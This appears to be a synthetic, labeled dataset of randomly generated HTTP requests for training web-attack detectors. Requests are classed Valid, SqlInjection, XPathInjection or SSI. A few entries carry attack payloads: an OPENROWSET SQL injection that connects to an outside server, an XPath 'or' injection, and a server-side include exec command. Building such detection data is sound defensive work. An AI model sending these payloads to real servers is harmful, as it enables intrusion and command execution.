If-Range: Sun, 23 Jul 06 14:20:41 CET
Max-Forwards: 0
MIME-Version: 4.8
Pragma: nh9eh=aWi
Proxy-Authorization: Digest nc=CBADdAaC
Authorization: Digest algorithm=nesB0A
Range: -58,-7,-12255
Referer: http://hlsaarrs.st/E3ast/wslza/xcSay9sI/Er1t.mdb
TE: trailers,gzip,chunked;q=0.3
Trailer: Host
User-Agent: t7SettebehthnyEa2tn0
UA-CPU: x86
UA-Disp: 035,2744,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 066x3039
Via: htcial/8.9 www.womjiISd.js, HTTP/4.2 www.eheex.jpeg
Transfer-Encoding: identity
Upgrade: asg/6.6, aeyyeD/5.2, eeae/5.5, sfi/1.0
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 9911764547155
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39724
Start - Id: 33885
class: Valid
PUT /e2CSgg5NQpdfKEyEr/dh8hKues8nEhnltIor/oy/ayePaeBGf/8EHlogbvX/z0XBXAd/sbaaatifTi/ouzuIt8U6Q0dBw/G0xp_-tuL/h0G@anp/sroynbaef/fbif.aspx? HTTP/1.1
Content-Length: 140
Content-Language: lAeda,r
Content-Encoding: gzip
Content-Location: http://insl6ti.be/ntons/Erihbhz/udomr/mreDir/yhetoih.pdf
Content-MD5: ZWxZcmRzOXJlZkNwdXNzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 25 Dec 05 12:11:51 GMT
Last-Modified: Tue, 07 Apr 09 03:09:24 GMT
Host: 176.222.74.211
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-9, cp-932
Accept-Encoding: 
Accept-Language: rdhdnl-C7tuie1;q=0.6
Cache-Control: Ey3tpyA='qe6hid'
Client-ip: 119.61.104.88
Cookie: bToAl=767;T5tSa374=o/y@r ec0a($log q;dfxTiEkza=@s;wrntnrtdsSdmhr=t;kn87eta5ybc=26320;pedIed1h3hre=msAlvkeanm1
Cookie2: $Version="780"
Date: Sun, 28 Mar 10 14:06:39 GMT
ETag: W/"tzyJ_TQrMtj44tAw.pg4"
Expect: 100-continue
From: tietc@t0ytt.net
If-Modified-Since: Sun, 11 Jun 06 17:43:57 UTC
If-Unmodified-Since: Sat, 12 Nov 05 09:56:55 GMT
If-Match: *
If-None-Match: "lOnGndKhB@MC8UUvQUc"
If-Range: *
Max-Forwards: 15
MIME-Version: 4.9
Pragma: qru6i='nafnn'
Proxy-Authorization: Digest cnonce="xuyiars"
Authorization: les4s rtcIc=tswor
Range: 10-81
Referer: http://aivscapE.biz/dLinis9/wWeso1cf/otRouAcw.mpeg
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.2 (Machintosh; U; PPC 4.7; oe-dx; rv:5.3.5) Gecko/48660865
UA-CPU: PowerPC
UA-Disp: 4653,644,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 1982x002
Via: 7.9 226.153.31.215, FTP/6.9 220.209.168.53
Transfer-Encoding: virF
Upgrade: eeend/5.3, ctbpo/1.4, 1ep/5.7, cXeiP/1.0
Warning: 882 142.2.211.21 "mandllmshmE2a" "Mon, 21 Feb 05 13:03:13 GMT"
X-Forwarded-For: 197.252.39.199
X-Serial-Number: 500728161806520
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

hJepsOnetcatGi=99045&n41aaUhper3=saefk?a|&u0hthds=1194232986&lo7s=sqbHdA&lhATitoutoha=49&candMS7location=t9ietgoOCoreqoetP&ttss=39691646

End - Id: 33885
Start - Id: 477
class: Valid
GET /buB/e59Fvnfn0c2w/h5eeIAr/yCG6koRF7f2h/Ethd0imwrtvtr0soegln/ooa/andPUy8V.Ophp2bDpassthrub/2deSnEiioeosEsnaunt/e@eG3IN7QH-r146L@d/anjdI.Mlca6I/nhe/MKPGsA.htm?ea5nETaroteoamt=5hntDprakd&hoeb8eRem=l7njIcm5mTrer%7Ct%24ea&d0AAMyVMYF=jermphpeTomgKatt HTTP/1.0
Host: 51.103.65.235
Connection: close
Accept: application/rtf;q=0.0, audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: identity, identity, compress, deflate
Accept-Language: uor2vYia-sww3qASs;q=0.8
Cache-Control: only-if-cached
Client-ip: 140.180.57.47
Cookie: Da.A=locationsi E oenphpi9zrfj5;il6DsstsSaso=tWk6m@hcALyO;UPBthTFGG8hz=ie8ie;t9ioliSenxn=6608025
Cookie2: $Version="3"
Date: Sat, 03 Feb 07 21:30:36 GMT
ETag: W/"zhUg8gxWz9yf@l6"
Expect: 9eenr=qiMlasE
From: 0mojo@hf1oov.st
If-Modified-Since: Thu, 10 Nov 05 02:16:52 UTC
If-Unmodified-Since: Sun, 19 Jul 09 04:04:39 CET
If-Match: "PTSWRFxl406MFMllg37s"
If-None-Match: *
If-Range: Sun, 31 Jan 10 09:50:24 CET
Max-Forwards: 293
MIME-Version: 9.6
Pragma: ona='bthg'
Proxy-Authorization: NTLM aG5pRmhlbmhyYXNsSTF5dGNhZXlvaXJybmVvZDkzcklpaWg5cG90YVNlbA==
Authorization: Basic VG92b2IyYjphU2VB
Range: -0193,67-,55248-036771
Referer: /ehr6iee/otmta.conf
TE: trailers,trailers,chunked
Trailer: Accept
User-Agent: oVBHomJeR http://www.cEeucmu.ch
UA-CPU: StrongARM
UA-Disp: 506,620,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7413x7082
Via: 0.5 213.163.30.62:6108
Transfer-Encoding: deflate
Upgrade: fOhwz/1.0, oniv/8.1, s3fenz/6.5
Warning: 976 148.134.175.140 "ftiyhn7Flr5m" "Sun, 28 Feb 10 03:59:16 CET"
X-Forwarded-For: 81.35.162.33
X-Serial-Number: 9170010950
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 477
Start - Id: 30399
class: Valid
GET /f_CE64odBiFSFz6Ac/7hlh/idithoeSia/tudyoicarbeV.html?y8Ek8tseitgsdzv=4bhHeip8h5Cn&2lrsqxcso1mlis=tiarobud2kie&Rla=3906642&gkonMHHFinclude5=95y&cn9eh12ozmr=lstylea7&5ttespea=268&7otSw3rc8haidsa=yotas HTTP/1.1
Host: www.aedik.uk:80
Connection: keep-alive
Accept: audio/*, image/gif
Accept-Charset: cp-936, macintosh, us-ascii, x-mac-cyrillic;q=0.7, x-mac-chinesesimp;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale
Client-ip: 78.227.166.226
Cookie: Slesja4z=uKVPNhIgh@C;Xm9OSEE0K=49442;WA@Tf=fsnub;7iq7xeher3d6ot=89;VU0OJSBkYbc@=neR~j6m  J>(Aah;i1bLtEenpg=drops
Cookie2: $Version="529"
Date: Fri, 23 Dec 05 03:30:01 CET
ETag: "hs3nAIXBY4HQpN@pDKq"
Expect: kttQeco=eOore
From: eonljol@h9iohse.fr
If-Modified-Since: Sun, 12 Sep 04 16:35:26 UTC
If-Unmodified-Since: Tue, 24 May 05 17:52:08 CET
If-Match: "0LKuHqFArX7iMDz"
If-None-Match: "VU2vSd4o4QCt5v-"
If-Range: Tue, 30 May 06 11:54:51 GMT
Max-Forwards: 06
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest response="8afccBaFa8C53a374752ae7CeF32Fcc8"
Authorization: Basic czNFaXplZTp3ZXJzUWk=
Range: 13594-
Referer: /3aiztt/iS0ia.msf
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.7 (Windows; U; Win98 1.1; in-ns; rv:0.7.5) Gecko/44276300
UA-CPU: 68000
UA-Disp: 178,649,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9503x4246
Via: ncuoS/9.9 166.3.227.187
Transfer-Encoding: compress
Upgrade: oeadm/5.1
Warning: 682 www.80xealf.html "rhmuiAtbtnaeaaaad2s" "Tue, 14 Apr 09 03:50:14 UTC"
X-Forwarded-For: 179.94.180.111
X-Serial-Number: 157029836
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30399
Start - Id: 15886
class: Valid
GET /bA7RVsu-kdH6lgrLpls/lcrtuwl/2cVL%u28RNtNxDo1/wRhliketq/6w1XWA/p0T1jyOPO4a_4--czR/f6m/HhYfZFN6Q1NgC_.sh?4sHlwp-b=%3Be%3Bee%2Feh%3F&waiy2Tld3oaree=dhdnwindow.opennole&zD@J8I0D0=%2Bgk&1ceeeadriab=oPvRwQOF5zk&uiaegwoe1hgln=1887&kG1K-XMmailin=iC2VptBU&u0ymyesioipefte=206339&see2i=53&lnaionhss=t%5D6sreidSeo4%7Egeaqtn&cbLi=egm%25-&I2tn=Hbfhayyn%5Des HTTP/1.0
Host: 100.229.249.120
Connection: iiacmua
Accept: audio/*, video/*;q=0.8, video/mpeg
Accept-Charset: *;q=0.5
Accept-Encoding: compress;q=0.6, deflate;q=0.6, deflate;q=0.6, gzip;q=0.4, deflate;q=0.9
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 188.12.243.240
Cookie: laueryeni=imgncwnlahttpsm&;ir5e2aasmrjaOz=ss4e;i719t=teval2imjlhr%gzn8d;elaste=ee;rrota=7861
Cookie2: $Version="89"
Date: Sun, 01 Feb 04 21:17:42 UTC
ETag: W/"zNM1sZ70pkYR7sUn"
Expect: tUOnsd=jes6ndZs;Iihhnrle
From: ks2tnwg@hnreg9rhrn.biz
If-Modified-Since: Tue, 05 Sep 06 23:13:11 UTC
If-Unmodified-Since: Fri, 13 Jul 07 11:13:21 UTC
If-Match: "sv63Lj_iCk5DFPqk"
If-None-Match: "qmgo6DJL9ZbDJnIYdX"
If-Range: Thu, 30 Aug 07 11:37:17 UTC
Max-Forwards: 810
MIME-Version: 5.5
Pragma: nzx2=fra3xa
Proxy-Authorization: nogyu eet8g=aNnn
Authorization: Basic aXNXZXJldGI6cnRzdGZzeA==
Range: 141-7620
Referer: /ey9s/Cenq/padhohrn.zip
TE: deflate;q=0.9
Trailer: Host
User-Agent: ikI2roa
UA-CPU: MIPS
UA-Disp: 318,100,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 664x941
Via: HTTP/4.2 179.94.157.232, FTP/6.4 www.higsmwth.jpg:2
Transfer-Encoding: compress
Upgrade: uqntt/3.9, elnR/2.6
Warning: 350 131.15.21.242 "Sel0th" "Sun, 27 Jul 08 18:49:35 CET"
X-Forwarded-For: 188.189.177.85
X-Serial-Number: 828350
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 15886
Start - Id: 13100
class: Valid
GET /nasu7rzs0dbidoghai/iousepoHnV4Xiohes/lhEfe40nBolwlNxlheT.aspx? HTTP/1.0
Host: www.rszaaanA.it
Connection: rtetsAra
Accept: text/html, audio/basic;q=0.6
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: min-fresh=1941
Client-ip: 249.221.127.55
Cookie: 8mt=+4e;hu=3092461770;flsze2apdB=emkdnamete8e8s;anrfssraP=wr4tvbscriptbU%8mnc
Cookie2: $Version="38"
Date: Sun, 06 Sep 09 21:28:05 UTC
ETag: W/"PBAqh8lskvytzoaH_"
Expect: vn0oRta6=bigseso;4zS2eu
From: lxksWme@metbhbeef.it
If-Modified-Since: Fri, 18 Sep 09 24:06:51 UTC
If-Unmodified-Since: Wed, 26 Apr 06 17:45:41 GMT
If-Match: "RpL5rB9-elzp03Y19h"
If-None-Match: *
If-Range: Mon, 20 Aug 07 14:39:55 GMT
Max-Forwards: 3666
MIME-Version: 5.0
Pragma: ln='t'
Proxy-Authorization: Digest response="04cA77a35eD11B63aeA1e7AFC096DEab"
Authorization: NTLM ZW5laHByTjJhNjdxVG84b2ZybnpJTnVkbWxkbWl0OXdyb2NtaXR0anJuN3dEenNl
Range: -7936
Referer: http://www.yhen.uk/0stdmee/1tnzsmoE.png
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
User-Agent: lee9tes/9.2.8
UA-CPU: Sparc
UA-Disp: 160,1655,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1747x3249
Via: 9.7 253.93.108.84, 7.2 200.13.61.159
Transfer-Encoding: gzip
Upgrade: rddiP/8.7
Warning: 669 112.73.215.188 "jta67bnsspeflree52nt" 
X-Forwarded-For: 129.45.112.20
X-Serial-Number: 74451528959
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13100
Start - Id: 26766
class: Valid
GET /epIGFLJH/eye6soweiea7/0tmndjobOuuNonn75.shtml?ssst=44783&ccnjeot5jiteq=epsdnkmo%27nliS+&5nt2aRbxcmehm=AE%40o&lm066eoIy0seed=956&fVU9E5=opt0rrlsrefi&dRz44lkwqz=b9&hjios5z=yr&DFYDDfLkY=oM3yPVee%40le5&7sVt=50350&9iI5P6B=dslpCkVzs&khzulsdo=1193244&le=e%5Clogfn HTTP/1.1
Host: www.hEthcd.uk
Connection: keep-alive
Accept: image/gif;q=0.0, application/*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: yfasoh-ansobfI
Cache-Control: max-stale
Client-ip: 215.148.101.111
Cookie: xfdaakptsi=shutdown8
Cookie2: $Version="868"
Date: Wed, 06 Sep 06 10:07:34 CET
ETag: "ecRAGY-3geTFtmku3"
Expect: 100-continue
From: euklqRgh@mrdmngws.fr
If-Modified-Since: Sat, 06 May 06 10:18:42 GMT
If-Unmodified-Since: Fri, 28 Dec 07 05:25:43 UTC
If-Match: "o2HGVlKbqOD5oBxjj"
If-None-Match: "13nmkErYWrV9wDPS"
If-Range: "kkbPGbEv6OZW_.EPjQJr"
Max-Forwards: 5587
MIME-Version: 7.6
Pragma: 8='5aaepi'
Proxy-Authorization: sxjt uxsrq=ar1Aoefn
Authorization: NTLM c2VlZWMycmE0ZXN5bm9xdGVZc0htZTdjMnRpdG5hYWNyVEU=
Range: 56-
Referer: http://zSHo.net/oss6.sh
TE: deflate,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/2.5 (Machintosh; U; PPC 7.8; 8s-oL; rv:5.9.7) Gecko/81353517
UA-CPU: StrongARM
UA-Disp: 8774,317,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 358x270
Via: 3.7 154.89.133.136, gyb/5.8 www.rye4.shtml, FTP/0.1 www.rrEh.js:751
Transfer-Encoding: identity
Upgrade: oek/3.9
Warning: 136 www.ehRdg.jpeg "ee4de" "Tue, 22 Nov 05 24:02:23 UTC"
X-Forwarded-For: 184.128.191.151
X-Serial-Number: 1194043277645
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26766
Start - Id: 34648
class: Valid
POST /ihiawtmnantftn/MnhthoscaAqauaut/hp5c/erN/o5vdZ1uRE/dtLsaeo5udst/teiLhednonreSool.png? HTTP/1.1
Content-Length: 191
Content-Language: phes7,TbOAAlc
Content-Encoding: gzip
Content-Location: /mrer/hhqmw1/shknd.pl
Content-MD5: YWlkaUloaDhjbHV0QXJtYg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 18 May 04 17:04:47 CET
Last-Modified: Tue, 14 Sep 04 03:36:45 CET
Host: 127.242.226.249
Connection: rdF8sn
Accept: audio/*, application/*, audio/x-wav;q=0.8
Accept-Charset: x-mac-ce;q=0.3, iso-8859-3
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 67.93.72.22
Cookie: tuNe=02
Cookie2: $Version="2"
Date: Tue, 03 Jan 06 11:21:01 GMT
ETag: "qe_7hAVu7Wn2tFiI"
Expect: 100-continue
From: a0ehHLe@uoneoi1.gov
If-Modified-Since: Sat, 22 Jul 06 13:06:02 CET
If-Unmodified-Since: Tue, 19 Sep 06 01:44:47 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 08
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic ZWFicElhTDo3aW9ubQ==
Authorization: Digest username="eemhmowa"
Range: -92449,63-97080,49-2
Referer: http://www.togioio.st/lqpEici/7ede/rpitu/r76Ta/aeepwa.php
TE: deflate,chunked,trailers
Trailer: Connection
User-Agent: shSes (hHv95h; zk0o-8; iUdsWY; eThAL9vZAJ; t2JBelAs5v)
UA-CPU: PowerPC
UA-Disp: 379,2037,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3397x406
Via: 9.6 www.htr2nnrp.css
Transfer-Encoding: gzip
Upgrade: 0lmc/3.2
Warning: 527 76.238.80.61 "hris94" 
X-Forwarded-For: 139.243.218.142
X-Serial-Number: 09613
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

7@fJyX_S3lS3= caIsgoeeorfn&qltpis=5 &Rek2XJUVxo=6adeltaN&Rnfi2seanmv=47tezeir&i2eon6us=mxKEBymp-v&simhp=Esu5edieigposition3eP&mueinIdtrI=rrcg&fA=8819246969&aiUhs8ageki4ewo=n kinaexml&hcxtn=rr

End - Id: 34648
Start - Id: 27815
class: Valid
GET /n-eu2uN@Cq4UWS/gEY86IKRbXrGueNWLe/rq6pZrSNvU3w1OPT/6nmwIfhtolaB/gXF/systemd3_C/lRgeU1Zprocessing-instructionwOY/h4gHY/yPztRvHo-kuCv.css? HTTP/1.1
Host: 226.122.66.105
Connection: uecpt0i4
Accept: application/x-tar, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 26.146.129.98
Cookie: wgetb0a8vwp-kR.=nTr5t;ntPer=:apyvpositionnitdX;ld0s=4845133
Cookie2: $Version="203"
Date: Sat, 11 Sep 04 10:46:09 CET
ETag: "tRzaKECpHOWHYgx.EaLP"
Expect: 100-continue
From: Iaitkel@rOtuy.it
If-Modified-Since: Tue, 23 Mar 04 17:56:28 GMT
If-Unmodified-Since: Sat, 15 Jul 06 13:01:27 GMT
If-Match: "5.R8Bxowqm5JsfliupK"
If-None-Match: "xhWGnPyAVmcQPa3"
If-Range: Mon, 17 Oct 05 22:45:35 GMT
Max-Forwards: 0
MIME-Version: 8.8
Pragma: htxeo='esu'
Proxy-Authorization: NTLM bm1pbmVuZUM4cmhhc2VydWF0aWV2cm1vbmNnaW1hc2VzdHZ3Z2xE
Authorization: onnlh ictat=oug4Ar
Range: 2-546079,522-3
Referer: /yom1t/p13Eeot/otorE/tiiyy.cfm
TE: deflate,deflate;q=0.7,trailers
Trailer: From
User-Agent: e.57wRp1x http://www.eLdea.ch
UA-CPU: x86
UA-Disp: 626,6964,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 370x5547
Via: 5.5 200.6.209.233:383, 6.5 247.149.3.157
Transfer-Encoding: gzip
Upgrade: 8oArj/0.3, elhh/1.2, 9oUsf/7.4, bib/0.3
Warning: 228 www.oikad9p.html "n7asOt" 
X-Forwarded-For: 171.157.110.56
X-Serial-Number: 26514
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27815
Start - Id: 35380
class: SqlInjection
GET /fTte/hClbwqA/zdSf_RKrOzpasswdSOa/eQUlrz4admin/elxat5sdrnrtteotl/Ad67As_J96VXAm/eSd3k-2f4XQZJ..oHw/X4oid1m5vcs1./aylZ0l/6p6glHndilnw/-jes8447qb/snoEuqnrfo.png?otelilaytetyie=804528750&1cmh7ncde=hGbBTU6HxOB&eTfmt0gi=%3B+++++select+++*+++from+++OPENROWSET%28+++%27SQLoledb%27%2C%27uid%3DweigiaIfi%3Bpwd%3Drnsiepr%3BNetwork%3DDBMSSOCN%3BAddress%3D45.223.250.210%2C43570%3B%27%2C%27select++++*++from++r9Hxydja8%27++++%29&ut=awheresles0%25iejea%24 HTTP/1.1
Host: 4.238.179.210:62552
Connection: ttceyIt
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: gzip;q=0.7, compress;q=0.3, identity, gzip;q=0.9, deflate;q=0.7
Accept-Language: la6uo-oY, hostsntW-osht;q=0.5
Cache-Control: no-cache
Client-ip: 246.233.58.195
Cookie: 0p=tGh3etetuoh
Cookie2: $Version="49"
Date: Tue, 04 Mar 08 03:25:37 GMT
ETag: W/"YrySjLvL9c7uR21"
Expect: 100-continue
From: 0boosr3e@ftEeuLd2wt.it
If-Modified-Since: Wed, 24 Feb 10 24:50:18 GMT
If-Unmodified-Since: Wed, 11 Nov 09 16:58:16 UTC
If-Match: "VK6tZFF1ZfIx56bA3e7W"
If-None-Match: "ZZ8Aq7akGRPuQnNd771"
If-Range: Sat, 06 May 06 18:07:06 UTC
Max-Forwards: 2
MIME-Version: 9.2
Pragma: Qbd3hDeU=acrtaxe
Proxy-Authorization: wsul areisdr=nehaa
Authorization: NTLM aWFoanN0aXZlZWdsZXcwbFNnd2dlcnRycG90ZG1oVTJobmRuckVX
Range: 187-
Referer: http://toleoe.net/easn6R/6y7swi/enmdro.php3
TE: deflate;q=0.9,chunked;q=0.6
Trailer: Transfer-Encoding
User-Agent: naaaiNHsn8/3.5.7
UA-OS: Windows 95
UA-Pixels: 1597x768
Via: 3.7 33.213.144.25, FTP/0.0 235.54.172.154:9246
Transfer-Encoding: reoej
Warning: 012 87.127.171.211 "neieAoyzeceydgth" 
X-Forwarded-For: 31.250.119.48
X-Serial-Number: 6475982437005855
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35380
Start - Id: 49499
class: XPathInjection
GET /osk/rrLlQZfT1zcr4/8Skid_c.nsf?f.mocha5N83=mjyek&aeso=yakic-oLi%5Ca%27R&tbaNue=13&soteE=9&yhphw=eSuv%27+or++mna%2Fdalt3%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D2%5D+++or+++%27emhuS%27++++%3D+%27&zRDZ3JD2o89=otre9nmutRt&ac4a8n=6677 HTTP/1.1
Host: 43.173.82.158:0374
Connection: keep-alive
Accept: */*
Accept-Charset: big5, x-mac-chinesesimp;q=0.5, windows-1251, cp-950;q=0.1, windows-1251;q=0.6
Accept-Encoding: gzip;q=0.1, identity
Accept-Language: *;q=0.0
Cache-Control: max-age=1
Client-ip: 223.242.155.63
Cookie: hANTYB=aos3tDloe;yNos3ahnt6v8eli=035_B3QVO5Z0;cmdmLfaVlibgwherereplace=2200561231;@qdCOunc@2Dw=yz
Cookie2: $Version="238"
Date: Fri, 09 Feb 07 12:45:10 GMT
ETag: "Pcv9xX0C1jYW.QIrMfv"
Expect: 100-continue
From: amlp2vta@vfese.gov
If-Modified-Since: Thu, 08 Nov 07 10:37:50 CET
If-Unmodified-Since: Tue, 20 Nov 07 06:44:45 GMT
If-Match: "w7U_LuQnnG@u_ZoyO"
If-None-Match: "p9MTEzSs1941HKOsl"
If-Range: Fri, 27 Apr 07 16:29:58 UTC
Max-Forwards: 2025
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: oou7tu fstmaHe6=oaua
Authorization: urdmey er4o=atlis
Range: 2-801463,7709-,5-5829
Referer: /ft4sti/3encTacc/aeoeUdse.bin
TE: gzip;q=0.5
Trailer: Authorization
User-Agent: enoaVavanrose
UA-CPU: 68000
UA-Disp: 4263,349,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 527x1451
Via: 7.6 171.145.143.112, FTP/0.0 15.145.31.115
Transfer-Encoding: rTe7; iemnm=htin
Upgrade: n7e/3.5, tspSaa/1.0, aveuwt/9.7
Warning: 410 www.st6tgso.css "mdhmtyeir8nd" "Tue, 20 Jul 04 04:31:53 CET"
X-Forwarded-For: 206.176.73.188
X-Serial-Number: 201583507
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 49499
Start - Id: 39878
class: SSI
GET /cHJosorpN5/ocLtLP8/sisgo4ewnfeRAehd2Gco/iYn@8bi/irbpnhu/6Xnee5rtejjchoaui.php?xt=hua+jme&Dtrenytn=79020729&me6ds=6274110454&B71M_Kn=n&v5ari=%3Bw3Nspasock_stream8e&drAh=545 HTTP/1.1
Host: 182.198.145.116:84
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: <!    #<!--#exec    cmd="id"-->
Accept-Language: n-eanrbE;q=0.8, eet-hrtar0o;q=0.6, 7aeud-sUi;q=0.9, n-i;q=0.4
Cache-Control: no-cache
Client-ip: 90.214.6.22
Cookie: vm=0dneio;Bi04EtelnetX=26txOmjdoNe]wherercorujo
Cookie2: $Version="077"
Date: Wed, 30 Jun 04 09:58:39 GMT
ETag: "i7eJf.firbXs3xwA7"
Expect: 100-continue
If-Modified-Since: Fri, 23 Feb 07 16:44:37 UTC
If-Unmodified-Since: Wed, 31 Oct 07 21:06:07 GMT
If-Match: *
If-None-Match: "uNqb24wBbYe@6RiYOD"
If-Range: *
Max-Forwards: 3285
Pragma: no-cache
Proxy-Authorization: Basic MmxmSWQ6d05Ob1Rv
Authorization: Digest response="588BB11Bf1Daeda328B52909f4c06cF8"
Range: -0,1188-79
Referer: /mebos/d2a0/amBuyelr.jsp
TE: trailers,chunked;q=0.7
Trailer: Via
User-Agent: weroye9G0tsr22oHe9
UA-OS: FreeBSD
Via: 2.3 115.139.148.151:648, HTTP/3.2 www.d0lunGsc.jpeg, 5.7 110.111.149.12
Transfer-Encoding: compress
X-Forwarded-For: 200.44.171.179
~~~~~: ~~~~~~~~~~~~

null

End - Id: 39878
Start - Id: 22822
class: Valid
GET /m9brOqigQ5@zn/O@Z/zYumQZPx8y/LfXZandmbyhtaccess/DnullAA.XhFOtcWjk/sPPJ_SYc50Uq/mztfaesaoOp/zcron1/bYG4@jeIu6Rm/j8.b78KR_xxhYVH/ehOisaelo.shtml?wt0gtiiUwer=235&eTtdqujtnst=045317 HTTP/1.0
Host: www.OrscucmHac.st:80
Connection: keep-alive
Accept: image/*
Accept-Charset: iso-8859-5, x-mac-arabic
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 173.3.239.168
Cookie: 06eTDe=la3EnnE;iI=eeTwiebegavm;hrebi=lgoieNmdt;rtnk=d;htacceszBdocumentkCA8B=491203
Cookie2: $Version="2"
Date: Wed, 06 Dec 06 17:23:39 GMT
ETag: W/"oSLg.vCUJVD7fTrQ"
Expect: thahue1
From: ea3t@i3OhaEidC.uk
If-Modified-Since: Fri, 12 Aug 05 07:28:43 UTC
If-Unmodified-Since: Mon, 22 Oct 07 16:18:47 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 626
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic YzFTb1RyYXM6MVRubm94bmk=
Authorization: Basic bGFpbklhcjphaWRiT3Rtag==
Range: 1016-,1-936,-4477
Referer: /Djnt/legosuh/hrfottie/ltbt/aNteyeei.png
TE: trailers
Trailer: Upgrade
User-Agent: miltxm2uLF http://www.robniap.it
UA-CPU: 68000
UA-Disp: 7936,637,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 612x9972
Via: 7.0 www.ieem1hhe.shtml
Transfer-Encoding: identity
Upgrade: gt7o/0.8
Warning: 800 240.77.225.63 "td5atf" 
X-Forwarded-For: 207.142.89.78
X-Serial-Number: 8712140
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22822
Start - Id: 19865
class: Valid
GET /djE1brL/ePa63WjxIc/Thb/ahpAp2vTe.cgi?czueTaniai7ts=3dstdine+trl&csuAo=IwinntTi+e%24%3Ffnetcat&r3tvchsm6euda=uic0r HTTP/1.1
Host: 58.20.238.221
Connection: btsr
Accept: */*;q=0.6
Accept-Charset: windows-1254;q=0.3, gb2312, x-mac-cyrillic
Accept-Encoding: compress, identity;q=0.5, compress;q=0.4, gzip
Accept-Language: eCwTmotd-Er7loat;q=0.1, zsmi-Iln;q=0.0, wbs-htien, atrni-nueat;q=0.1
Cache-Control: no-store
Client-ip: 171.173.25.232
Cookie: abi=Tn  ~trcP;qefnli9etnG9so=4Ordghsa3Sas6hu;N@homedCQubin=27
Cookie2: $Version="4"
Date: Thu, 02 Apr 09 02:33:26 GMT
ETag: W/"73v.MveY3tOSGACvv5K"
Expect: nj62OiS
From: ebMr@ot7cggaev.net
If-Modified-Since: Sun, 18 Apr 04 13:20:12 CET
If-Unmodified-Since: Mon, 26 Mar 07 07:26:46 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 85
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic YXRkcFRlZTpuc0UyZW5pbA==
Authorization: tea1o nhanj=jrinhc
Range: -436,22187-4
Referer: http://5iTcflc.be/t6ub/9wln/ni6gSd/otZl/phihgo.html
TE: deflate;q=0.7,trailers
Trailer: Accept-Encoding
User-Agent: rrGra3gh (xDM-Fi7i; cDpK1wHE1@; kYZnSN.OJy; tCdBq6pI@)
UA-CPU: StrongARM
UA-Disp: 798,862,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 378x5840
Via: FTP/1.7 223.41.134.84
Transfer-Encoding: h4nl0a; ebohfe=atyiLus
Upgrade: ieot/7.9
Warning: 622 www.dgcaas.png "crere38dmlecltR" "Fri, 12 Oct 07 12:04:28 CET"
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 62361021711
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19865
Start - Id: 35911
class: XPathInjection
POST /0OSnn9iyOs/UsiuhiWewatnf0ntxfm.jsp? HTTP/1.0
